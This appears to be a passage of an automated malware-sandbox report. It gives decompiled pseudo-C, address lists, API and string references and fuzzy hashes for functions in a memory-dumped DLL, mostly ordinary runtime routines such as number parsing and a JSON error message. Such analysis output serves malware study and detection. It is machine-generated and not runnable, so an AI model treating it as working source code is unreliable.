				_t92 = _t90 + 0x24 +  *(_t184 - 0x34) - _t139;
				 *0x6e2189f0 = _t92;
				 *0x6e218984 = _t92 + _t139 + 3;
				E6E17E782(_t117, _t184 - 0xa8, _t172, _t177, _t92 + _t139 + 3);
				 *(_t184 - 4) = 5;
				_t142 =  *0x6e2189a0; // 0xf24087a
				_t173 =  *0x6e218988; // 0xfbec8649
				_t178 =  *0x6e2189f0; // 0xc8c83700
				_t164 = 0x2b;
				do {
					 *(_t184 - 0x2c) = _t178;
					if(_t178 != ( *0x6e218990 & 0x000000ff)) {
						_t173 = _t173 - _t142 - _t178 - 0xb;
						_t106 =  *0x6e21898c; // 0x0
						asm("sbb eax, 0x0");
						 *((intOrPtr*)(_t164 + 0x6e218990)) =  *((intOrPtr*)(_t164 + 0x6e218990)) - _t142;
						 *0x6e21898c = _t106;
						_t178 = _t173 - _t142 -  *(_t184 - 0x2c);
						 *(_t184 - 0x34) = _t106;
					}
					_t164 = _t164 - 2;
					_t205 = _t164 - 2;
				} while (_t164 > 2);
				_t179 =  *0x6e218984; // 0xf02e13b7
				 *0x6e222b18 = _t164;
				 *0x6e218988 = _t173;
				 *0x6e2189f0 = _t142 - _t173 + 0xc;
				 *(_t184 - 4) = 4;
				E6E17E03C();
				 *(_t184 - 4) = 3;
				E6E17E03C();
				 *(_t184 - 4) = 2;
				E6E17E7B1(_t205);
				 *(_t184 - 4) = 1;
				E6E17FB57(_t184 - 0x28);
				 *(_t184 - 4) =  *(_t184 - 4) | 0xffffffff;
				E6E181438();
				return E6E1A9D9D(_t179, _t117, _t173, _t179);
			}

0x6e17dc30
0x6e17dc3a
0x6e17dc3f
0x6e17dc52
0x6e17dc5a
0x6e17dc5b
0x6e17dc61
0x6e17dc64
0x6e17dc74
0x6e17dc77
0x6e17dc81
0x6e17dc86
0x6e17dc8b
0x6e17dc92
0x6e17dc94
0x6e17dc9d
0x6e17dca7
0x6e17dcad
0x6e17dcbb
0x6e17dcc6
0x6e17df86
0x6e17df8b
0x6e17df92
0x6e17df93
0x6e17df99
0x6e17df9d
0x6e17df9f
0x6e17dfa9
0x6e17dfae
0x6e17dfb2
0x6e17dfb9
0x6e17dfbe
0x6e17df93
0x6e17dccc
0x6e17dcde
0x6e17dce4
0x6e17dce5
0x6e17dcea
0x6e17dcf9
0x6e17dcfe
0x6e17dd02
0x6e17dd08
0x6e17dd0a
0x6e17dd23
0x6e17dd25
0x6e17dd25
0x6e17dd2a
0x6e17dd3c
0x6e17dd3f
0x6e17dd47
0x6e17dd49
0x6e17dd54
0x6e17dd5a
0x6e17dd5d
0x6e17dd64
0x6e17dd64
0x6e17dd67
0x6e17dd67
0x6e17dd6c
0x6e17dd6d
0x6e17dd75
0x6e17dd7a
0x6e17dd7e
0x6e17dd84
0x6e17dd91
0x6e17dd9f
0x6e17ddb1
0x6e17ddbc
0x6e17ddbc
0x6e17ddc8
0x6e17ddcb
0x6e17ddcd
0x6e17ddd2
0x6e17ddd2
0x6e17dde4
0x6e17ddeb
0x6e17ddee
0x6e17ddf5
0x6e17ddfb
0x6e17ddfe
0x6e17de04
0x6e17de07
0x6e17de09
0x6e17de0b
0x6e17de0e
0x6e17de14
0x6e17de19
0x6e17de1b
0x00000000
0x00000000
0x6e17de1d
0x6e17de28
0x6e17de2c
0x6e17de35
0x6e17de37
0x6e17de39
0x6e17de3f
0x6e17de45
0x6e17de4a
0x00000000
0x00000000
0x6e17de4c
0x6e17de51
0x6e17de57
0x6e17de5a
0x6e17de5a
0x6e17de5b
0x6e17de60
0x6e17de72
0x6e17de76
0x6e17de7f
0x6e17de83
0x6e17de84
0x6e17de85
0x6e17de86
0x6e17de8d
0x6e17de92
0x6e17de96
0x6e17de9b
0x6e17deac
0x6e17deae
0x6e17debb
0x6e17dec0
0x6e17dec5
0x6e17dec9
0x6e17decf
0x6e17ded5
0x6e17dedd
0x6e17dede
0x6e17dee5
0x6e17deea
0x6e17def3
0x6e17def5
0x6e17defc
0x6e17deff
0x6e17df07
0x6e17df0c
0x6e17df0f
0x6e17df0f
0x6e17df12
0x6e17df15
0x6e17df15
0x6e17df1a
0x6e17df25
0x6e17df2b
0x6e17df31
0x6e17df37
0x6e17df41
0x6e17df46
0x6e17df50
0x6e17df55
0x6e17df5c
0x6e17df61
0x6e17df68
0x6e17df6d
0x6e17df74
0x6e17df80

APIs

__EH_prolog3_GS.LIBCMT ref: 6E17DC3A

Strings

tub, xrefs: 6E17DD6D
warm, xrefs: 6E17DCF4

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: tub$warm
API String ID: 2427045233-333621177
Opcode ID: 6dd7640f6f219a5b0e83199a885df2287d1cb016a1c0d05a2095d2f176294607
Instruction ID: d411e029a2c49e8aec409bb60017c3f6c8ad2e05373fb6de866d61cd79354265
Opcode Fuzzy Hash: 6dd7640f6f219a5b0e83199a885df2287d1cb016a1c0d05a2095d2f176294607
Instruction Fuzzy Hash: 44A1D2B19029558FCF1CCFB8C99A6E8BBB6BB47304F184229D251A7780DB345784DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CAE6D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E1CAEFD

Strings

pow, xrefs: 6E1CAED5, 6E1CAEF2

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7c2090f37d07ee508b830fac2e90b439a0ea23c90d0e8699aa67d86f272aca52
Instruction ID: e359c573bc0cf9da538cc5f5c2c92d3f17efc07f75a5fee2beeb247947ad61ea
Opcode Fuzzy Hash: 7c2090f37d07ee508b830fac2e90b439a0ea23c90d0e8699aa67d86f272aca52
Instruction Fuzzy Hash: C4518DA161C5029ACB03AAD4C97039E37E49BA1F00F708E58E496C619CEB7D48D9F6C7

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A8FDE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6E1A8FDE(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				signed int* _t39;
				signed int _t40;
				char _t42;
				signed int _t43;
				signed int _t44;
				void* _t45;
				void* _t47;
				void* _t48;
				void* _t53;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t65;
				signed int _t67;
				signed int _t69;
				void* _t71;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				void* _t83;
				intOrPtr _t84;
				signed int _t87;
				void* _t89;
				void* _t90;

				_t39 = _a16;
				_t90 = _t89 - 0x18;
				if(_t39 != 0) {
					 *_t39 =  *_t39 & 0x00000000;
				}
				_t65 = _a4;
				_push(_t83);
				_t87 = _t65;
				_t40 =  *_t65 & 0x000000ff;
				L4:
				if(E6E1B65DD(_t65, _t83, _t40) != 0) {
					_t87 = _t87 + 1;
					__eflags = _t87;
					_t40 =  *_t87 & 0x000000ff;
					goto L4;
				}
				_t42 =  *_t87;
				_v6 = _t42;
				if(_t42 == 0x2d || _t42 == 0x2b) {
					_t87 = _t87 + 1;
					__eflags = _t87;
				} else {
					_v6 = 0x2b;
				}
				_t84 = _a12;
				if(_t84 < 0 || _t84 == 1 || _t84 > 0x24) {
					_t43 = _a8;
					__eflags = _t43;
					if(_t43 != 0) {
						 *_t43 = _t65;
					}
					goto L52;
				} else {
					if(_t84 <= 0) {
						__eflags =  *_t87 - 0x30;
						if( *_t87 == 0x30) {
							_t45 =  *(_t87 + 1);
							__eflags = _t45 - 0x78;
							if(_t45 == 0x78) {
								L24:
								_t84 = 0x10;
								L25:
								_t87 = _t87 + 2;
								L26:
								_v16 = _t87;
								_t47 =  *_t87;
								while(_t47 == 0x30) {
									_t87 = _t87 + 1;
									__eflags = _t87;
									_t47 =  *_t87;
								}
								_t69 = 0;
								_v28 = _t87;
								_t67 = 0;
								_v20 = 0;
								_v24 = 0;
								_v5 = 0;
								_t48 = _t47;
								while(1) {
									_v12 = _t69;
									_t71 = E6E1AD780("0123456789abcdefghijklmnopqrstuvwxyz", E6E1B6BA7(_t48), _t84);
									_t90 = _t90 + 0xc;
									if(_t71 == 0) {
										break;
									}
									_t52 = _v12;
									_t80 = "0123456789abcdefghijklmnopqrstuvwxyz";
									_v20 = _v12;
									_v24 = _t67;
									_v5 = _t71 - _t80;
									_t53 = E6E1AA030(_t84, 0, _t52, _t67);
									_t67 = _t80;
									asm("cdq");
									_t69 = _t53 + _v5;
									asm("adc ebx, edx");
									_t87 = _t87 + 1;
									__eflags = _t87;
									_t48 =  *_t87;
								}
								if(_v16 != _t87) {
									_t22 = _t84 + 0x6e1f2714; // 0x10101011
									_t76 = _t87 -  *_t22 - _v28;
									__eflags = _t76;
									if(_t76 < 0) {
										L45:
										__eflags = _v6 - 0x2d;
										_t44 = _v12;
										if(_v6 == 0x2d) {
											_t44 =  ~_t44;
											asm("adc ebx, 0x0");
											_t67 =  ~_t67;
										}
										L47:
										_t77 = _a8;
										__eflags = _t77;
										if(_t77 != 0) {
											 *_t77 = _t87;
										}
										L53:
										return _t44;
									}
									__eflags = _t76;
									if(__eflags > 0) {
										L42:
										 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x22;
										_t57 = _a16;
										__eflags = _t57;
										if(_t57 != 0) {
											 *_t57 = 1;
										}
										_t44 = _t57 | 0xffffffff;
										_t67 = _t44;
										goto L47;
									}
									_t78 = _v12;
									asm("cdq");
									_v16 = _t78;
									_v16 = _v16 - _v5;
									_t59 = _t67;
									asm("sbb eax, edx");
									_v28 = _t59;
									__eflags = _t67 - _t59;
									if(__eflags < 0) {
										goto L42;
									}
									_t60 = _v16;
									if(__eflags > 0) {
										L40:
										__eflags = E6E1AA070(_t60, _v28, _t84, 0) - _v20;
										if(__eflags != 0) {
											goto L42;
										}
										__eflags = _t80 - _v24;
										if(__eflags == 0) {
											goto L45;
										}
										goto L42;
									}
									__eflags = _t78 - _t60;
									if(__eflags < 0) {
										goto L42;
									}
									goto L40;
								}
								_t79 = _a8;
								if(_t79 != 0) {
									 *_t79 = _a4;
								}
								L52:
								_t44 = 0;
								goto L53;
							}
							__eflags = _t45 - 0x58;
							if(_t45 == 0x58) {
								goto L24;
							}
							_push(8);
							L20:
							_pop(_t84);
							goto L26;
						}
						_push(0xa);
						goto L20;
					}
					if(_t84 != 0x10 ||  *_t87 != 0x30) {
						goto L26;
					} else {
						_t63 =  *(_t87 + 1);
						if(_t63 == 0x78) {
							goto L25;
						}
						if(_t63 != 0x58) {
							goto L26;
						}
						goto L25;
					}
				}
			}

0x6e1a8fe1
0x6e1a8fe4
0x6e1a8fe9
0x6e1a8feb
0x6e1a8feb
0x6e1a8fef
0x6e1a8ff3
0x6e1a8ff4
0x6e1a8ff6
0x6e1a8fff
0x6e1a9008
0x6e1a8ffb
0x6e1a8ffb
0x6e1a8ffc
0x00000000
0x6e1a8ffc
0x6e1a900a
0x6e1a900c
0x6e1a9011
0x6e1a901d
0x6e1a901d
0x6e1a9017
0x6e1a9017
0x6e1a9017
0x6e1a901e
0x6e1a9023
0x6e1a918a
0x6e1a918d
0x6e1a918f
0x6e1a9191
0x6e1a9191
0x00000000
0x6e1a903b
0x6e1a903d
0x6e1a9056
0x6e1a9059
0x6e1a9060
0x6e1a9063
0x6e1a9065
0x6e1a906f
0x6e1a9071
0x6e1a9072
0x6e1a9072
0x6e1a9075
0x6e1a9077
0x6e1a907a
0x6e1a9081
0x6e1a907e
0x6e1a907e
0x6e1a907f
0x6e1a907f
0x6e1a9085
0x6e1a9087
0x6e1a908a
0x6e1a908c
0x6e1a908f
0x6e1a9092
0x6e1a9095
0x6e1a90c8
0x6e1a90ca
0x6e1a90df
0x6e1a90e1
0x6e1a90e6
0x00000000
0x00000000
0x6e1a909a
0x6e1a909d
0x6e1a90a8
0x6e1a90ac
0x6e1a90af
0x6e1a90b2
0x6e1a90b9
0x6e1a90bf
0x6e1a90c0
0x6e1a90c2
0x6e1a90c4
0x6e1a90c4
0x6e1a90c5
0x6e1a90c5
0x6e1a90eb
0x6e1a9102
0x6e1a910d
0x6e1a910d
0x6e1a9110
0x6e1a916d
0x6e1a916d
0x6e1a9171
0x6e1a9174
0x6e1a9176
0x6e1a9178
0x6e1a917b
0x6e1a917b
0x6e1a917d
0x6e1a917d
0x6e1a9180
0x6e1a9182
0x6e1a9184
0x6e1a9184
0x6e1a9197
0x6e1a919b
0x6e1a919b
0x6e1a9112
0x6e1a9114
0x6e1a914e
0x6e1a9153
0x6e1a9159
0x6e1a915c
0x6e1a915e
0x6e1a9160
0x6e1a9160
0x6e1a9166
0x6e1a9169
0x00000000
0x6e1a9169
0x6e1a911a
0x6e1a911d
0x6e1a911e
0x6e1a9121
0x6e1a9124
0x6e1a9126
0x6e1a9128
0x6e1a912b
0x6e1a912d
0x00000000
0x00000000
0x6e1a912f
0x6e1a9132
0x6e1a9138
0x6e1a9144
0x6e1a9147
0x00000000
0x00000000
0x6e1a9149
0x6e1a914c
0x00000000
0x00000000
0x00000000
0x6e1a914c
0x6e1a9134
0x6e1a9136
0x00000000
0x00000000
0x00000000
0x6e1a9136
0x6e1a90ed
0x6e1a90f2
0x6e1a90fb
0x6e1a90fb
0x6e1a9193
0x6e1a9193
0x00000000
0x6e1a9195
0x6e1a9067
0x6e1a9069
0x00000000
0x00000000
0x6e1a906b
0x6e1a905d
0x6e1a905d
0x00000000
0x6e1a905d
0x6e1a905b
0x00000000
0x6e1a905b
0x6e1a9042
0x00000000
0x6e1a9049
0x6e1a9049
0x6e1a904e
0x00000000
0x00000000
0x6e1a9052
0x00000000
0x00000000
0x00000000
0x6e1a9054
0x6e1a9042

APIs

__aulldiv.LIBCMT ref: 6E1A913F

Strings

-, xrefs: 6E1A916D
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 6E1A909D, 6E1A90D4, 6E1A90D9

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: c7afe2ac1f0879908b74fafbdcbc2803134378facbcdead327cd3f08e4fa9118
Instruction ID: 5ba5db5ac62f8bdc566b0c669fdb1a7eac656ce81edf76d0ee590c2073ed8edd
Opcode Fuzzy Hash: c7afe2ac1f0879908b74fafbdcbc2803134378facbcdead327cd3f08e4fa9118
Instruction Fuzzy Hash: 45514978B0828A5FDB158EEDE8707BE7BFD9F563A0F204459D690D7240C27289C1EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E183DE5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E183DE5(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				void* _t37;
				signed int _t49;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t59;
				void* _t61;
				void* _t62;
				intOrPtr _t67;
				intOrPtr _t71;
				void* _t72;
				void* _t80;
				void* _t84;

				_t62 = __edx;
				_t57 = __ecx;
				E6E1A9DF3(0x6e1eac4e, __ebx, __edi, __esi, 0x9c);
				_t56 = _t57;
				 *((intOrPtr*)(_t72 - 0x40)) = E6E1C1229(_t62, _t84);
				_t35 = E6E19294A(_t80, _t72 - 0x78);
				 *((intOrPtr*)(_t72 - 0x44)) = _t56;
				_t59 = 0xb;
				_t37 = memcpy(_t72 - 0x3c, _t35, _t59 << 2);
				 *(_t56 + 8) = _t37;
				 *(_t56 + 0x10) = _t37;
				 *(_t56 + 0x14) = _t37;
				 *(_t72 - 4) = _t37;
				_t67 = 0x6e1fc3cb;
				_t71 =  *((intOrPtr*)(_t72 - 0x40));
				_t81 =  *((intOrPtr*)(_t72 + 0xc)) - _t37;
				if( *((intOrPtr*)(_t72 + 0xc)) == _t37) {
					_t67 =  *((intOrPtr*)(_t71 + 8));
				}
				E6E19294A(_t81, _t72 - 0x78);
				_pop(_t61);
				_push(_t72 - 0xa4);
				_push(0);
				_push(_t67);
				 *(_t56 + 8) = E6E184FEB(_t56, _t61, _t62, _t67, _t71, _t81);
				_push(_t72 - 0x3c);
				_push(0);
				_push("false");
				 *(_t56 + 0x10) = E6E16223F(_t56, 0, _t71, _t81);
				_push(_t72 - 0x3c);
				_push(0);
				_push("true");
				 *(_t56 + 0x14) = E6E16223F(_t56, 0, _t71, _t81);
				 *((intOrPtr*)(_t72 - 0x44)) = 0;
				if( *((char*)(_t72 + 0xc)) == 0) {
					 *((short*)(_t56 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x30))));
					_t49 =  *( *(_t71 + 0x34)) & 0x0000ffff;
				} else {
					 *((short*)(_t56 + 0xc)) = E6E16220E(0x2e, 0, _t72 - 0x3c);
					_t49 = E6E16220E(0x2c, 0, _t72 - 0x3c) & 0x0000ffff;
				}
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				 *(_t56 + 0xe) = _t49;
				return E6E1A9D9D(_t49, _t56, 0, _t71);
			}

0x6e183de5
0x6e183de5
0x6e183def
0x6e183df4
0x6e183dfb
0x6e183e02
0x6e183e0c
0x6e183e14
0x6e183e15
0x6e183e17
0x6e183e1a
0x6e183e1d
0x6e183e20
0x6e183e23
0x6e183e28
0x6e183e2b
0x6e183e2e
0x6e183e30
0x6e183e30
0x6e183e37
0x6e183e3c
0x6e183e43
0x6e183e44
0x6e183e46
0x6e183e4f
0x6e183e57
0x6e183e58
0x6e183e59
0x6e183e66
0x6e183e6c
0x6e183e6d
0x6e183e6e
0x6e183e7b
0x6e183e82
0x6e183e85
0x6e183eb4
0x6e183ebb
0x6e183e87
0x6e183e96
0x6e183ea9
0x6e183ea9
0x6e183ebe
0x6e183ec2
0x6e183ecb

APIs

__EH_prolog3_GS.LIBCMT ref: 6E183DEF

Strings

false, xrefs: 6E183E59
true, xrefs: 6E183E6E

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 48eccd26271b1a01208347c378ed636d63ec382c19703cacb3340f1c03e13d7f
Instruction ID: c307a085617323ef5260c89ea5b741eccbfb39906fce4bcb72dcdb01de79d3ef
Opcode Fuzzy Hash: 48eccd26271b1a01208347c378ed636d63ec382c19703cacb3340f1c03e13d7f
Instruction Fuzzy Hash: 7F2171B2C00204EFDB14DFE1E844ADF77B8AF54710F14496AE815AF240EB30D985EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E194F4E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E194F4E(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t28;
				char _t37;
				intOrPtr _t40;
				intOrPtr _t41;
				void* _t45;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t50;
				void* _t53;
				void* _t56;

				_t53 = __eflags;
				_t45 = __edx;
				_t41 = __ecx;
				E6E1A9DF3(0x6e1ec828, __ebx, __edi, __esi, 0x34);
				_t49 = _t41;
				_t47 = E6E1C1229(_t45, _t56);
				E6E19294A(_t53, _t50 - 0x3c);
				 *((intOrPtr*)(_t50 - 0x40)) = _t49;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0;
				 *((intOrPtr*)(_t50 - 4)) = 0;
				E6E19294A(_t53, _t50 - 0x3c);
				_t40 =  *((intOrPtr*)(_t50 + 0xc));
				_t28 = 0x6e1fc3cb;
				_t54 = _t40;
				if(_t40 == 0) {
					_t28 =  *((intOrPtr*)(_t47 + 8));
				}
				_t44 = _t50 - 0x3c;
				_push(_t50 - 0x3c);
				_push(0);
				_push(_t28);
				 *((intOrPtr*)(_t49 + 8)) = E6E184FEB(_t40, _t50 - 0x3c, _t45, _t47, _t49, _t54);
				_push(_t50 - 0x3c);
				_push(0);
				_push("false");
				 *((intOrPtr*)(_t49 + 0x10)) = E6E184FEB(_t40, _t44, _t45, _t47, _t49, _t54);
				_push(_t50 - 0x3c);
				_push(0);
				_push("true");
				 *((intOrPtr*)(_t49 + 0x14)) = E6E184FEB(_t40, _t44, _t45, _t47, _t49, _t54);
				if(_t40 == 0) {
					 *((char*)(_t49 + 0xc)) =  *((intOrPtr*)( *_t47));
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t47 + 4))));
				} else {
					 *((char*)(_t49 + 0xc)) = 0x2e;
					_t37 = 0x2c;
				}
				 *((char*)(_t49 + 0xd)) = _t37;
				return E6E1A9D9D(_t37, _t40, _t47, _t49);
			}

0x6e194f4e
0x6e194f4e
0x6e194f4e
0x6e194f55
0x6e194f5a
0x6e194f61
0x6e194f67
0x6e194f6e
0x6e194f71
0x6e194f74
0x6e194f77
0x6e194f7a
0x6e194f81
0x6e194f86
0x6e194f89
0x6e194f90
0x6e194f92
0x6e194f94
0x6e194f94
0x6e194f97
0x6e194f9a
0x6e194f9b
0x6e194f9d
0x6e194fa3
0x6e194fa9
0x6e194faa
0x6e194fac
0x6e194fb6
0x6e194fbc
0x6e194fbd
0x6e194fbf
0x6e194fcc
0x6e194fd1
0x6e194fdf
0x6e194fe5
0x6e194fd3
0x6e194fd3
0x6e194fd7
0x6e194fd7
0x6e194fe7
0x6e194fef

APIs

__EH_prolog3_GS.LIBCMT ref: 6E194F55

Strings

false, xrefs: 6E194FAC
true, xrefs: 6E194FBF

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 3d68e3b9bd0ca3f924db88bbc280553d69b2c9cc732b1bbd2c742f132c35f77b
Instruction ID: 34660cdc78a9c11c1058243fbec82c809aac42dc343b214e0e64862c656faa77
Opcode Fuzzy Hash: 3d68e3b9bd0ca3f924db88bbc280553d69b2c9cc732b1bbd2c742f132c35f77b
Instruction Fuzzy Hash: C411BE75800741AEC724DFF8E480BCABBF8AB15604F00891AE1A6DF640DB30A58AEB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E18160C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E18160C(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t22;
				void* _t26;
				void* _t27;
				signed int _t36;
				intOrPtr _t39;
				intOrPtr* _t44;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t50;

				_t36 = __ecx;
				E6E1A9DBF(0x6e1e9315, __ebx, __edi, __esi, 8);
				_t48 = _t36;
				 *(_t50 - 0x14) = _t36;
				 *(_t50 - 0x10) =  *(_t50 - 0x10) & 0x00000000;
				_t22 = E6E1C12E0("[json.exception.");
				_t44 =  *((intOrPtr*)(_t50 + 8));
				_t46 =  *((intOrPtr*)(_t44 + 0x10));
				_t39 = 0x7fffffff - _t46;
				if(0x7fffffff < _t22) {
					E6E1616EF(_t39, _t44, _t48, __eflags);
					asm("int3");
					E6E1A9DBF(0x6e1ea4de, __ebx, _t46, _t48, 0xc);
					_t49 = _t39;
					 *((intOrPtr*)(_t50 - 0x18)) = _t49;
					__eflags = 0;
					 *(_t50 - 0x14) = 0;
					_t26 = E6E1C12E0("cannot use operator[] with a string argument with ");
					_pop(_t40);
					_push(_t26);
					_push(_t40);
					_t27 = E6E183CE1( *((intOrPtr*)(_t50 + 8)));
					 *(_t50 - 0x10) = 0;
					 *((intOrPtr*)(_t49 + 0x10)) = 0;
					 *((intOrPtr*)(_t49 + 0x14)) = 0;
					E6E17FD0F(_t27);
					 *(_t50 - 4) = 0;
					 *(_t50 - 0x14) = 1;
					return E6E1A9D88(_t49,  *(_t50 - 0x10));
				} else {
					if( *((intOrPtr*)(_t44 + 0x14)) >= 0x10) {
						_t44 =  *_t44;
					}
					_push(_t46);
					_push(_t44);
					_push(_t22);
					_push(_t39);
					_push(_t39);
					E6E183925(_t48);
					 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
					 *(_t50 - 0x10) = 1;
					return E6E1A9D88(_t48,  *((intOrPtr*)(_t50 + 8)));
				}
			}

0x6e18160c
0x6e181613
0x6e181618
0x6e18161a
0x6e18161d
0x6e181626
0x6e18162b
0x6e181634
0x6e181637
0x6e18163b
0x6e181667
0x6e18166c
0x6e181674
0x6e181679
0x6e18167b
0x6e18167e
0x6e181685
0x6e181688
0x6e18168d
0x6e18168e
0x6e181690
0x6e181694
0x6e181699
0x6e1816a1
0x6e1816a5
0x6e1816a8
0x6e1816ad
0x6e1816b0
0x6e1816be
0x6e18163d
0x6e181641
0x6e181643
0x6e181643
0x6e181645
0x6e181646
0x6e181647
0x6e181648
0x6e181649
0x6e18164f
0x6e181654
0x6e181658
0x6e181666
0x6e181666

APIs

__EH_prolog3.LIBCMT ref: 6E181613
_strlen.LIBCMT ref: 6E181626

Strings

[json.exception., xrefs: 6E181621

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_strlen
String ID: [json.exception.
API String ID: 782648989-791563284
Opcode ID: 26006c397f0edee700d7933de8319021c640883b85e437f690e6c94c3837ec7a
Instruction ID: dc3c4694c8c5fa69170fabe3c45f0e6413523d5818a9cdb7611d07cb77fd86ad
Opcode Fuzzy Hash: 26006c397f0edee700d7933de8319021c640883b85e437f690e6c94c3837ec7a
Instruction Fuzzy Hash: F4F090757001059BEB08DFD8D814BBFB77ABB80725F204A4CE0219E281CBB599C5ABE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E18166D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
